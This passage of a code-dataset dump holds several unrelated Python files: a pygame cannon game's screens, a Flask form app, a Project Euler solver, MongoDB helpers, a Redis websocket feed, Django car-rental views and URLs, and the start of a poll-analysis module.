self.__draw_cannon_level_index()\r\n        self.__draw_cannon_for_start_window()\r\n        self.__draw_flashing_txt_for_start()\r\n        # self.__draw_button_for_resetting_the_game()\r\n\r\n    def __draw_game_title(self):\r\n        self.__fontobj = 
pygame.font.SysFont('Agency FB', 40)\r\n        self.__txt_image_for_name = self.__fontobj.render('CANNON GAME', True, (0, 2, 2))\r\n        # self.__txt_rect_for_name = self.__txt_image_for_name.get_rect(center=(self.__window_width / 2, 50))\r\n        self.__txt_rect_for_name = self.__txt_image_for_name.get_rect(center=(250, 50))\r\n        self.__screen.blit(self.__txt_image_for_name, self.__txt_rect_for_name)\r\n\r\n    def __draw_cannon_level_index(self):\r\n        self.__txt_image_for_cannon_level = self.__fontobj.render('Cannon level: ' + str(self.cannon_level), True,\r\n                                                                  (0, 2, 2))\r\n        self.__txt_rect_for_cannon_level = self.__txt_image_for_cannon_level.get_rect(center=(self.__window_width\r\n                                                                                              / 2, 100))\r\n        self.__screen.blit(self.__txt_image_for_cannon_level, self.__txt_rect_for_cannon_level)\r\n\r\n    def __draw_cannon_for_start_window(self):\r\n        self.__scale_image = pygame.transform.scale(self.__image, (int(self.__image.get_width() // 6),\r\n                                                                   int(self.__image.get_height() // 6)))\r\n        self.__image_rect = self.__scale_image.get_rect(center=(self.__window_width / 2, self.__window_height / 2 - 50))\r\n        self.__screen.blit(self.__scale_image, self.__image_rect)\r\n\r\n    def __draw_flashing_txt_for_start(self):\r\n        txt = 'TAP TO START'\r\n        self.__flashing_txt_color_index, self.__lighting, self.__fogging = \\\r\n            color_txt_changer(self.__flashing_txt_color_index, self.__color_change_delta,\r\n                              self.__lighting, self.__fogging)\r\n        self.__fontobj = pygame.font.SysFont('Agency FB', 40)\r\n        self.__txt_image = self.__fontobj.render(txt, True, (self.__flashing_txt_color_index,\r\n                                                             self.__flashing_txt_color_index,\r\n                                                             self.__flashing_txt_color_index))\r\n        self.__txt_rect_for_name = self.__txt_image.get_rect(center=(self.__window_width / 2,\r\n                                                                     self.__window_height - 150))\r\n        self.__screen.blit(self.__txt_image, self.__txt_rect_for_name)\r\n\r\n    def __draw_button_for_resetting_the_game(self):\r\n        pygame.draw.rect(self.__screen, (129, 129, 129),\r\n                         (self.__button.x, self.__button.y, self.__button.width, self.__button.height))\r\n        fontobj = pygame.font.SysFont('Agency FB', 40)\r\n        txt_image = fontobj.render('reset the game', True, (0, 0, 0))\r\n        txt_rect = txt_image.get_rect(center=(self.__window_width / 2, self.__window_height / 2))\r\n        self.__screen.blit(txt_image, txt_rect)\r\n\r\n\r\nclass Finish_window:\r\n    def __init__(self, __screen, screen_width, screen_height, score, FPS_index, cannon_level, upgrade_cost):\r\n        self.__window_width = screen_width\r\n        self.__window_height = screen_height\r\n        self.__screen = __screen\r\n        self.__score = score\r\n        self.__flashing_txt_color_index = 0\r\n        self.__color_change_delta = int(255 / (FPS_index))\r\n        self.__fogging = False\r\n        self.__lighting = True\r\n        self.__fontobj = pygame.font.SysFont('Agency FB', 40)\r\n        self.upgrade_cost = upgrade_cost\r\n        self.cannon_level = cannon_level\r\n        self.__button = Rectangle(self.__window_width / 2 - 65, self.__window_height / 2 - 25, 130, 50)\r\n    \r\n    def draw_finish_window(self, mouse_button_down, click_event, complete_level):\r\n        # draw the background\r\n        pygame.draw.rect(self.__screen, (255, 255, 255), (0, 0, self.__window_width, self.__window_height))\r\n        if complete_level:\r\n            self.__draw_complete_level()\r\n        self.__draw_score()\r\n        self.__draw_flashing_txt_for_finish_window()\r\n        self.__draw_button_for_improve_cannon(mouse_button_down, click_event)\r\n        self.__draw_cannon_level()\r\n        self.__draw_upgrade_cost()\r\n\r\n    def __draw_complete_level(self):\r\n        txt = 'level complete'\r\n        txt_image = self.__fontobj.render(txt, True, (0, 0, 0))\r\n        
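        # midtop anchoring below pins the banner to the top-centre of the window,
        # independent of the window width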
txt_rect_for_name = txt_image.get_rect(midtop=(self.__window_width / 2, 7))\r\n        self.__screen.blit(txt_image, txt_rect_for_name)\r\n\r\n    def __draw_score(self):\r\n        txt = 'SCORE ' + str(self.__score)\r\n        txt_image = self.__fontobj.render(txt, True, (0, 0, 0))\r\n        txt_rect_for_name = txt_image.get_rect(center=(self.__window_width / 2, self.__window_height / 2 - 200))\r\n        self.__screen.blit(txt_image, txt_rect_for_name)\r\n\r\n    def __draw_cannon_level(self):\r\n        txt = 'CANNON LEVEL: ' + str(self.cannon_level)\r\n        txt_cannon_level_image = self.__fontobj.render(txt, True, (0, 0, 0))\r\n        txt_rect_for_cannon_level = txt_cannon_level_image.get_rect(center=(self.__window_width / 2,\r\n                                                                            self.__window_height / 2 - 100))\r\n        self.__screen.blit(txt_cannon_level_image, txt_rect_for_cannon_level)\r\n\r\n    def __draw_upgrade_cost(self):\r\n        txt = 'UPGRADE PRICE: ' + str(self.upgrade_cost)\r\n        txt_cannon_level_image = self.__fontobj.render(txt, True, (0, 0, 0))\r\n        txt_rect_for_cannon_level = txt_cannon_level_image.get_rect(center=(self.__window_width / 2,\r\n                                                                            self.__window_height / 2 - 150))\r\n        self.__screen.blit(txt_cannon_level_image, txt_rect_for_cannon_level)\r\n\r\n    def __draw_flashing_txt_for_finish_window(self):\r\n        txt = 'TAP TO RESTART'\r\n        self.__flashing_txt_color_index, self.__lighting, self.__fogging = \\\r\n            color_txt_changer(self.__flashing_txt_color_index, self.__color_change_delta,\r\n                              self.__lighting, self.__fogging)\r\n        txt_image = self.__fontobj.render(txt, True, (self.__flashing_txt_color_index, self.__flashing_txt_color_index,\r\n                                                      self.__flashing_txt_color_index))\r\n        txt_rect_for_name = txt_image.get_rect(center=(self.__window_width / 2, self.__window_height - 100))\r\n        self.__screen.blit(txt_image, txt_rect_for_name)\r\n\r\n    def the_mouse_intercect_the_button(self, mouse_pos):\r\n        if self.__button.x + self.__button.width < mouse_pos[0] or mouse_pos[0] < self.__button.x:\r\n            return False\r\n        if self.__button.y + self.__button.height < mouse_pos[1] or mouse_pos[1] < self.__button.y:\r\n            return False\r\n        return True\r\n    \r\n    def __draw_button_for_improve_cannon(self, mouse_pos, click_event):\r\n        pygame.draw.rect(self.__screen, (129, 129, 129), (self.__button.x, self.__button.y, self.__button.width,\r\n                                                          self.__button.height))\r\n        fontobj = pygame.font.SysFont('Agency FB', 30)\r\n        txt_image = fontobj.render('UPGRADE', True, (0, 0, 0))\r\n        txt_rect = txt_image.get_rect(center=(self.__window_width / 2, self.__window_height / 2))\r\n        self.__screen.blit(txt_image, txt_rect)\r\n        # print('UPGRADE')\r\n\r\n","sub_path":"game_windows.py","file_name":"game_windows.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384702334","text":"# Now we also need the request object\n# Also using redirect\nfrom flask import Flask, render_template, request, redirect\nimport pg\n\ndb = pg.DB(dbname='restaurant_db')\n\napp = Flask('MyFormApp')\n\n@app.route('/')\ndef form():\n    # Render the form.html template\n    return render_template(\n        'form.html',\n        title='Enter new project')\n\n# This URL receives the form submit and processes it\n@app.route('/submit_form', methods=['POST'])\ndef submit_form():\n    project_name = request.form['project_name']\n    project_description = request.form['project_description']\n    db.insert('project', name=project_name, description=project_description)\n    return redirect('/')\n\nif __name__ == '__main__':\n    
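    # debug=True turns on Flask's auto-reloader and interactive debugger;
    # handy during development, but it should be disabled in production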
app.run(debug=True)\n","sub_path":"flask_examples/05_flask_with_forms.py","file_name":"05_flask_with_forms.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"194713711","text":"\"\"\"\n12.\nA triangular number is formed by adding the natural numbers from 1 up to n in turn.\nFor example, the 7th triangular number is 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28.\nContinuing in this way, the first triangular numbers are:\n\n1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...\nNow list the divisors of these triangular numbers:\n\n 1: 1\n 3: 1, 3\n 6: 1, 2, 3, 6\n10: 1, 2, 5, 10\n15: 1, 3, 5, 15\n21: 1, 3, 7, 21\n28: 1, 2, 4, 7, 14, 28\nAs seen above, 28 is the first triangular number with five or more divisors.\n\nWhat, then, is the smallest triangular number with 500 or more divisors?\n\"\"\"\n\ndef getDivisor(start, limit):\n    sum =0\n    n =start\n    while True :\n        #divisors=[]\n        divisorCount =0\n        lastNum=0\n        sum+=n\n        #print(sum)\n        #alfNum=int(sum/2)\n        for i in range(1,sum):\n            mok=int(sum / i)\n            #print(mok)\n            if( sum == mok *i):\n                # divisor\n                if( lastNum ==mok):\n                    break\n                #divisors.append(i)\n                divisorCount+=1\n                lastNum =i\n            if( mok == i):\n                #square root\n                break\n        #print(divisors)\n        if(divisorCount*2 >=limit ):\n            return sum\n        n +=1\n\nprint(getDivisor(1, 500))","sub_path":"euler/problem12/eunsil.py","file_name":"eunsil.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"115696970","text":"from bson.objectid import ObjectId\nfrom pymongo.collection import ReturnDocument\n\n\ndef find_one_latest(collection):\n    '''Returns newest/latest object, stripped of the object id, or None if no object exists'''\n    try:\n        return collection.find({}, {'_id': False}).sort([('_id', -1)]).limit(1).next()\n    except StopIteration:\n        return None\n\n\ndef find_id_latest(collection):\n    '''Returns object id of newest/latest object, or None if no object exists'''\n    try:\n        return collection.find().sort([('_id', -1)]).limit(1).next()['_id']\n    except StopIteration:\n        return None\n\n\ndef update_run_state(\n    collection,\n    task_id,\n    state=\"UNKNOWN\"\n):\n    '''Update state of workflow run'''\n    return collection.find_one_and_update(\n        {\"task_id\": task_id},\n        {\"$set\": {\"api.state\": state}},\n        return_document=ReturnDocument.AFTER\n    )\n\n\ndef upsert_fields_in_root_object(\n    collection,\n    task_id,\n    root,\n    **kwargs\n):\n    '''Insert (or update) fields in(to) the same root (object) field'''\n    return collection.find_one_and_update(\n        {\"task_id\": task_id},\n        {\"$set\": {\".\".join([root, key]):value for (key,value) in kwargs.items()}},\n        return_document=ReturnDocument.AFTER\n    )\n\n\ndef update_tes_task_state(\n    collection,\n    task_id,\n    tes_id,\n    state\n):\n    \n    '''Update 'state' field in TES task log'''\n\n    return collection.find_one_and_update(\n        {\"task_id\": task_id, \"api.task_logs\": {\"$elemMatch\": {\"id\": tes_id}}},\n        {\"$set\" : {\"api.task_logs.$.state\" : state}},\n        return_document=ReturnDocument.AFTER\n    )\n\n\ndef append_to_tes_task_logs(\n    collection,\n    task_id,\n    tes_log\n):\n\n    '''Append task log to TES task logs'''\n\n    return collection.find_one_and_update(\n        {\"task_id\": task_id},\n        {'$push': {'api.task_logs': tes_log}},\n        return_document=ReturnDocument.AFTER\n    )","sub_path":"wes_elixir/database/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183913715","text":"import asyncio\nimport config\nimport aioredis\nfrom aioredis.pubsub import Receiver\nimport websockets\nfrom config import HEARTBEAT_DURATION, HEARBEAT_ON, 
DB_PING\nfrom constants import EXCHANGE_ID\nimport json\nfrom common import RedisQueryEngine\nfrom decimal import Decimal\n\n\nclass RedisToWS:\n\n def __init__(self):\n self.loop = asyncio.get_event_loop()\n self.loop.set_debug(True)\n self.query_maker = RedisQueryEngine(EXCHANGE_ID)\n\n def start(self):\n self.loop.run_until_complete(\n websockets.serve(self.ws_handler, '0.0.0.0', 8765),\n )\n self.loop.run_forever()\n\n async def ws_handler(self, websocket, path):\n # gather redis_ws_handler and heartbeat_ws_heandler\n await asyncio.gather(\n self.redis_ping(websocket),\n self.redis_orders_ws_handler(websocket),\n self.heartbeat_ws_handler(websocket),\n self.redis_trades_ws_handler(websocket),\n )\n\n async def get_redis_connection(self):\n return await aioredis.create_connection((config.REDIS_PATH, 6379))\n\n async def redis_query(self, query, *query_args):\n if DB_PING:\n conn = await self.get_redis_connection()\n return await conn.execute(query, *query_args, encoding='utf-8')\n\n async def redis_ping(self, websocket):\n conn = await self.get_redis_connection()\n res = await self.redis_query('ping')\n await websocket.send(res)\n\n async def get_order_state(self, message):\n order_data = json.loads(message[1])\n side = order_data['side']\n price = order_data['price']\n pair = order_data['pair']\n userid = order_data['userid']\n query = self.query_maker.get_order_ids_by_price(pair, side, price)\n conn = await self.get_redis_connection()\n order_ids = await self.redis_query(*query)\n # this order_ids is the list of all orderids at this price, should contain just one item if no other order\n # if nothing is there that means it got matched and no amount (zero) is th latest state\n if order_ids:\n queries = [self.query_maker.get_order_amount_by_order_id(i) for i in order_ids]\n amounts = [await self.redis_query(*q) for q in queries]\n amount = str(sum(Decimal(i) for i in amounts))\n else:\n amount = '0'\n orders_state = {'price':price, 'side':side, 'amount':amount, 'userid':userid, 'n_orders':len(order_ids)}\n return str(orders_state)\n\n async def redis_orders_ws_handler(self, websocket):\n connection = await self.get_redis_connection()\n receiver = Receiver()\n connection.execute_pubsub('subscribe', receiver.channel('orders'))\n while (await receiver.wait_message()):\n order_delta = await receiver.get()\n actual_order = await self.get_order_state(order_delta)\n await websocket.send(actual_order)\n\n async def redis_trades_ws_handler(self, websocket):\n receiver = Receiver()\n connection = await self.get_redis_connection()\n connection.execute_pubsub('subscribe', receiver.channel('trades'))\n while (await receiver.wait_message()):\n message = await receiver.get()\n await websocket.send(message[1].decode('utf-8'))\n\n async def heartbeat_ws_handler(self, websocket):\n while HEARBEAT_ON:\n await asyncio.sleep(HEARTBEAT_DURATION)\n #message = str(await self.redis_query(\n # 'ZRANGEBYSCORE',\n # 'ASKS:exchange-1:ETHUSD',\n # '192120000',\n # '192120000',\n #))\n await websocket.send('💚')\n #await websocket.send(message)\n\n\nif __name__ == '__main__':\n feed = RedisToWS()\n feed.start()\n","sub_path":"src/ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136066653","text":"\"\"\"main URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. 
Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom webapp.views import PostListView, PostDetailView, PostCreateView, PostDeleteView, PostUpdateView, UserListView, UserDetailView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('accounts/', include('webauth.urls', namespace='webauth')),\n path('', PostListView.as_view(), name='post_list'),\n path('post/', PostDetailView.as_view(), name='post_detail'),\n path('post/create', PostCreateView.as_view(), name='post_create'),\n path('post//post_delete', PostDeleteView.as_view(), name='post_delete'),\n path('post//update', PostUpdateView.as_view(), name='post_update'),\n path('user', UserListView.as_view(), name='user_list'),\n path('user/', UserDetailView.as_view(), name='user_detail')\n\n]\n","sub_path":"source/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154179340","text":"from django.shortcuts import render, render_to_response\nfrom .models import Vehicle, Customer, Reservation, Suggestion, Location\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.db.models import Q\nfrom .forms import *\nimport pytz\nfrom django.contrib import messages\nimport datetime\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nfrom django.db.models import Q\n\n\n# Create your views here.\n\ndef car_return_form(request, r_id, vin_no):\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n retForm = VehicleReturnForm(request.POST or None)\n suggestionForm = VehicleReturnSuggestionForm(request.POST or None)\n reservation = Reservation.objects.get(id=r_id)\n\n # api here\n def calculate_rental_charge(initialResTime, initialRetTime, actualRetTime, rentPerHour1, rentPerHour2,\n lateFee):\n finalFee = 0\n\n def calculateHours(a, b):\n print(type(a))\n seconds = a - b\n return seconds // 3600\n\n regularHours = calculateHours(initialRetTime.timestamp(), initialResTime.timestamp())\n try:\n extraHours = calculateHours(datetime.datetime.now().timestamp(), initialRetTime.timestamp())\n except:\n extraHours=0\n\n base = 0\n advance = 0\n if regularHours > rentPerHour2[0]:\n finalFee += rentPerHour1[1] * rentPerHour1[2]\n base = finalFee\n finalFee += (regularHours - rentPerHour1[1]) * rentPerHour2[2]\n advance = finalFee - base\n else:\n finalFee += regularHours * rentPerHour1[2]\n base = finalFee\n chargeExtra = 0\n if extraHours > 0:\n chargeExtra = extraHours * lateFee\n print(base, advance)\n return base, advance, chargeExtra, finalFee + chargeExtra\n\n vehicle = Vehicle.objects.get(vin_no=vin_no)\n base, advance, lateCharge, total = calculate_rental_charge(reservation.reservation_datetime,\n reservation.return_datetime,\n reservation.actual_returntime, [1, 5, vehicle.basic_fee],\n [5, 72, vehicle.advanced_fee],\n vehicle.late_fee)\n\n obj = {'base': base, 'advance': advance, 'lateCharge': lateCharge, 'total': total}\n context = {\n 'retForm': retForm,\n 'reservation': reservation,\n 
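        # 'obj' below is the fee breakdown (base, advance, lateCharge, total)
        # returned by calculate_rental_charge above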
'suggestionForm': suggestionForm,\n 'obj': obj,\n }\n\n if retForm.is_valid() and request.user.is_authenticated and suggestionForm.is_valid():\n reservation = Reservation.objects.get(id=r_id)\n rental_location = reservation.rental_location\n loc = Location.objects.get(rental_location=rental_location)\n loc.no_of_vehicles = loc.no_of_vehicles + 1\n loc.save()\n\n print(reservation.reservation_status)\n reservation.reservation_status = 'RTD'\n reservation.actual_returntime = datetime.datetime.now()\n reservation.save()\n\n # change here\n\n suggestion = suggestionForm.cleaned_data['suggestion']\n Suggestion.objects.create(user=request.user, reservation_id=reservation, suggestion=suggestion)\n messages.success(request, 'Rental Vehicle Returned Successfully!!')\n return HttpResponseRedirect('/user_reservation')\n\n return render(request, 'zip/return_details.html', context)\n\n\ndef car_request_form(request, make_model, vin_no, rental_location):\n\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n customer = Customer.objects.get(user=request.user)\n if customer.last_membership_date < datetime.date.today():\n messages.error(request, 'get membership')\n return HttpResponseRedirect('/membership')\n form = VehicleRequestForm(request.POST or None)\n # customer=Customer.objects.get(user=request.user)\n context = {\n 'form': form,\n 'make_model': make_model,\n 'vin_no': vin_no,\n 'rental_location': rental_location\n }\n\n if customer.last_membership_date < datetime.date.today():\n messages.error(request, 'get membership')\n return HttpResponseRedirect('')\n\n if form.is_valid() and request.user.is_authenticated and customer.last_membership_date >= datetime.date.today():\n\n v = Vehicle.objects.get(vin_no=vin_no)\n rental_location = v.rental_location\n loc = Location.objects.get(rental_location=rental_location)\n loc.no_of_vehicles = loc.no_of_vehicles - 1\n loc.save()\n reservation_datetime = form.cleaned_data['reservation_datetime']\n return_datetime = form.cleaned_data['return_datetime']\n # print(reservation_datetime,return_datetime)\n rental_charge = 0\n tz = pytz.timezone('US/Pacific')\n time = datetime.datetime.now(tz).strftime('%Y-%m-%d %H:%M')\n if str(reservation_datetime) < time:\n messages.error(request, 'Wrong Reservation Date!')\n return HttpResponseRedirect(request.path_info)\n if return_datetime <= reservation_datetime:\n messages.error(request, 'Wrong Return Date!')\n return HttpResponseRedirect(request.path_info)\n if (return_datetime - reservation_datetime).days >= 3:\n messages.error(request, 'Maximum 3 days allowed!')\n return HttpResponseRedirect(request.path_info)\n flag = 0\n reservation_datetime = reservation_datetime.strftime('%Y-%m-%d %H:%M')\n return_datetime = return_datetime.strftime('%Y-%m-%d %H:%M')\n reservation_vin_location = Reservation.objects.filter(vin_no=vin_no).filter(\n rental_location=rental_location).filter(~Q(reservation_status=\"RTD\")).all()\n if reservation_vin_location.count() != 0:\n reserved_time = Reservation.objects.filter(vin_no=vin_no).filter(rental_location=rental_location).filter(\n ~Q(reservation_status=\"RTD\")).values('reservation_datetime', 'return_datetime')\n start, end = [], []\n for reserved in reserved_time:\n s = reserved['reservation_datetime']\n s = s.strftime(\"%Y-%m-%d %H:%M\")\n start.append(s)\n e = reserved['return_datetime']\n e = e.strftime(\"%Y-%m-%d %H:%M\")\n end.append(e)\n # messages.info(request,''+str(start)+str(end))\n start.sort()\n end.sort()\n if str(return_datetime) <= start[0]:\n 
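                # the requested window ends before the earliest existing
                # reservation starts, so the vehicle is free for this slot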
flag = 1\n            for i in range(len(end) - 1):\n                if str(reservation_datetime) >= end[i]:\n                    if str(return_datetime) <= start[i + 1]:\n                        ## Reservation can be done\n                        flag = 1\n            if str(reservation_datetime) >= end[-1]:\n                flag = 1\n            if flag == 1:\n                reservation = Reservation(user=request.user.username, rental_location=rental_location,\n                                          rental_charge=rental_charge, vin_no=vin_no,\n                                          reservation_datetime=reservation_datetime, return_datetime=return_datetime)\n                reservation.save()\n                messages.success(request, \"Thank you for the reservation. Enjoy your ride!\")\n                return HttpResponseRedirect('/user_reservation')\n            else:\n                messages.info(request,\n                              'Reservation cannot be done at this location and time. Available vehicles at alternate locations.')\n                reserved_vehicles = Reservation.objects.filter(reservation_datetime=reservation_datetime).filter(\n                    return_datetime=return_datetime).filter(~Q(reservation_status=\"RTD\")).values('vin_no')\n                all_vehicles = Vehicle.objects.values('vin_no')\n                rv, al = [], []\n                for vehicle in reserved_vehicles:\n                    rv.append(vehicle['vin_no'])\n                for vehicle in all_vehicles:\n                    al.append(vehicle['vin_no'])\n                available_vehicles = list(set(al) - set(rv))\n                vehicles = Vehicle.objects.filter(pk__in=available_vehicles)\n                context = {\n                    'vehicles': vehicles\n                }\n                return render(request, 'zip/car_detail.html', context)\n        else:\n            reservation = Reservation(user=request.user.username, rental_location=rental_location,\n                                      rental_charge=rental_charge, vin_no=vin_no,\n                                      reservation_datetime=reservation_datetime, return_datetime=return_datetime)\n            reservation.save()\n            messages.success(request, \"Thank you for the reservation. Enjoy your ride!\")\n            return HttpResponseRedirect('/user_reservation')\n    return render(request, 'zip/car_request.html', context)\n\n\ndef car_search_form_view(request):\n\n    if not request.user.is_authenticated :\n        return HttpResponseRedirect('/zip/login')\n    customer = Customer.objects.get(user=request.user)\n\n    if customer.last_membership_date < datetime.date.today():\n        messages.error(request, 'get membership')\n        return HttpResponseRedirect('/membership')\n\n    if request.method == 'POST':\n        form = VehicleSearchForm(request.POST)\n        if form.is_valid() and request.user.is_authenticated:\n            make_model_query = form.cleaned_data['make_model']\n            rental_location_query = form.cleaned_data['rental_location']\n            vehicle_type_query = form.cleaned_data['vehicle_type']\n            vehicles = Vehicle.objects.filter(make_model__contains=make_model_query).filter(\n                rental_location=rental_location_query).filter(vehicle_type__contains=vehicle_type_query)\n            if vehicles.count() == 0:\n                messages.error(request, make_model_query + ' vehicle is not available at ' + str(rental_location_query))\n                alternate_location = Vehicle.objects.filter(make_model__contains=make_model_query).filter(\n                    vehicle_type__contains=vehicle_type_query).first()\n                vehicles = Vehicle.objects.filter(make_model__contains=make_model_query).filter(\n                    vehicle_type__contains=vehicle_type_query).all()\n                if alternate_location is not None:\n                    messages.success(request, 'The Vehicle is available at ' + str(alternate_location.rental_location))\n            context = {\n                'vehicles': vehicles\n            }\n            return render(request, 'zip/car_detail.html', context)\n\n    form = VehicleSearchForm(request.POST or None)\n    context = {\n        'form': form\n    }\n    return render(request, 'zip/car_search.html', context)\n\n\ndef default_view(request):\n    return render(request, 'base.html')\n\n\ndef locations_add_view(request):\n    import csv\n    global line\n    path = 
'/Users/lokesh/Desktop/sp20-cmpe-202-sec-49-team-project-fourreal/locations.csv'\n\n with open(path) as f:\n reader = csv.reader(f)\n for row in reader:\n _, created = Location.objects.get_or_create(\n rental_location=row[0],\n rental_location_address=row[1],\n vehicle_capacity=row[2],\n no_of_vehicles=row[3],\n )\n\n\ndef car_view(request):\n # context={}\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n customer = Customer.objects.get(user=request.user)\n if customer.last_membership_date < datetime.date.today():\n messages.error(request, 'get membership')\n return HttpResponseRedirect('/membership')\n\n vehicles = Vehicle.objects.all()\n\n context = {\n 'vehicles': vehicles\n }\n return render(request, 'zip/car_detail.html', context)\n\n\n# cancelling reservation\ndef cancel_reservation(request, r_id):\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n reservation = Reservation.objects.get(id=r_id)\n currentTime = datetime.datetime.now()\n initialResTime = reservation.reservation_datetime\n try:\n seconds = (currentTime.timestamp() - initialResTime.timestamp())\n except:\n seconds=0\n\n if -(seconds // 3600) <= 1:\n reservation.reservation_status = 'RTD'\n reservation.save()\n ## Minimum one-hour charge applied\n messages.success(request, \"The Reservation has been cancelled successfully!, Your card will be charged 15$ cancelation fee\")\n return HttpResponseRedirect('/user_reservation')\n else:\n reservation.reservation_status = 'RTD'\n reservation.save()\n\n messages.success(request, \"The Reservation has been cancelled successfully!, You have not been charged anything\")\n return HttpResponseRedirect('/user_reservation')\n\n\n# def car_request_view(request,car):\n\n# # User.objects.filer to see if user is legit or not\n# # See if car is available or not\n# # if user exists and car exists register it\n# if request.user.is_authenticated:\n# user=request.user.get_username()\n# status='Pending'\n# transaction=Reservation(user=user, car=car, status=status)\n# transaction.save()\n# return render(request, 'zip/car_search.html')\n\n\ndef car_all_search_form_view(request):\n if not request.user.is_authenticated :\n return HttpResponseRedirect('/zip/login')\n customer = Customer.objects.get(user=request.user)\n if customer.last_membership_date < datetime.date.today():\n messages.error(request, 'get membership')\n return HttpResponseRedirect('/membership')\n\n if request.method == 'POST':\n form = VehicleAllSearchForm(request.POST or None)\n if form.is_valid() and request.user.is_authenticated:\n query = form.cleaned_data['query']\n print(query)\n location = Location.objects.filter(rental_location__icontains=query)\n print(location)\n vehicles = Vehicle.objects.filter(Q(make_model__icontains=query) | Q(rental_location__in=location))\n print(vehicles)\n\n if vehicles.count() == 0:\n messages.success(request, 'No Results found ')\n context = {\n 'vehicles': vehicles\n }\n return render(request, 'zip/car_detail.html', context)\n\n form = VehicleAllSearchForm(request.POST or None)\n context = {\n 'form': form\n }\n return render(request, 'zip/car_search.html', context)\n","sub_path":"zip/car_views.py","file_name":"car_views.py","file_ext":"py","file_size_in_byte":14698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"371008640","text":"import time\n\npoll_rows1 = [{\"ID\": 1, \"State\": \"WA\", \"Pollster\": \"A\", \"Date\": \"Jan 07 2010\"},\n {\"ID\": 2, \"State\": 
\"WA\", \"Pollster\": \"B\", \"Date\": \"Mar 21 2010\"},\n {\"ID\": 3, \"State\": \"WA\", \"Pollster\": \"A\", \"Date\": \"Jan 08 2010\"},\n {\"ID\": 4, \"State\": \"OR\", \"Pollster\": \"A\", \"Date\": \"Feb 10 2010\"},\n {\"ID\": 5, \"State\": \"WA\", \"Pollster\": \"B\", \"Date\": \"Feb 10 2010\"},\n {\"ID\": 6, \"State\": \"WA\", \"Pollster\": \"B\", \"Date\": \"Mar 22 2010\"}]\n\nrows1 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'}]\nrows2 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 05 2008', 'Pollster': 'PPP'},\n {'State': 'CA', 'Dem': '1.0', 'Rep': '10.3', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'}]\nrows3 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 05 2008', 'Pollster': 'PPP'},\n {'State': 'CA', 'Dem': '2.1', 'Rep': '3.2', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'},\n {'State': 'WA', 'Dem': '9.1', 'Rep': '7.1', 'Date': 'Nov 05 2008', 'Pollster': 'IPSOS'},\n {'State': 'CA', 'Dem': '1.0', 'Rep': '10.3', 'Date': 'Nov 04 2008', 'Pollster': 'IPSOS'}]\nrows4 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 05 2008', 'Pollster': 'PPP'},\n {'State': 'WA', 'Dem': '1.0', 'Rep': '10.3', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'}]\nrows5 = [{'State': 'WA', 'Dem': '1.0', 'Rep': '0.1', 'Date': 'Nov 05 2008', 'Pollster': 'PPP'},\n {'State': 'CA', 'Dem': '2.1', 'Rep': '3.2', 'Date': 'Nov 04 2008', 'Pollster': 'PPP'},\n {'State': 'OR', 'Dem': '9.1', 'Rep': '7.1', 'Date': 'Nov 05 2008', 'Pollster': 'IPSOS'}]\n\n\ndef row_to_edge(row):\n \"\"\"\n Given an *ElectionDataRow* or *PollDataRow*, returns the\n Democratic *Edge* in that *State*.\n \"\"\"\n return (float(row[\"Dem\"]) - float(row[\"Rep\"]))\n\n\ndef state_edges(election_result_rows):\n \"\"\"\n Given a list of *ElectionDataRow*s, returns *StateEdge*s.\n The input list has no duplicate *States*;\n that is, each *State* is represented at most once in the input list.\n \"\"\"\n d = {}\n for row in election_result_rows:\n state = row['State']\n d[state] = row_to_edge(row)\n return d\n\n\ndef earlier_date(date1, date2):\n \"\"\"\n Given two dates as strings (formatted like \"Oct 06 2012\"), returns True if\n date1 is before date2.\n \"\"\"\n return (time.strptime(date1, \"%b %d %Y\") < time.strptime(date2, \"%b %d %Y\"))\n\n\ndef most_recent_poll_row(poll_rows, pollster, state):\n \"\"\"\n Given a list of *PollDataRow*s, returns the most recent row with the\n specified *Pollster* and *State*. 
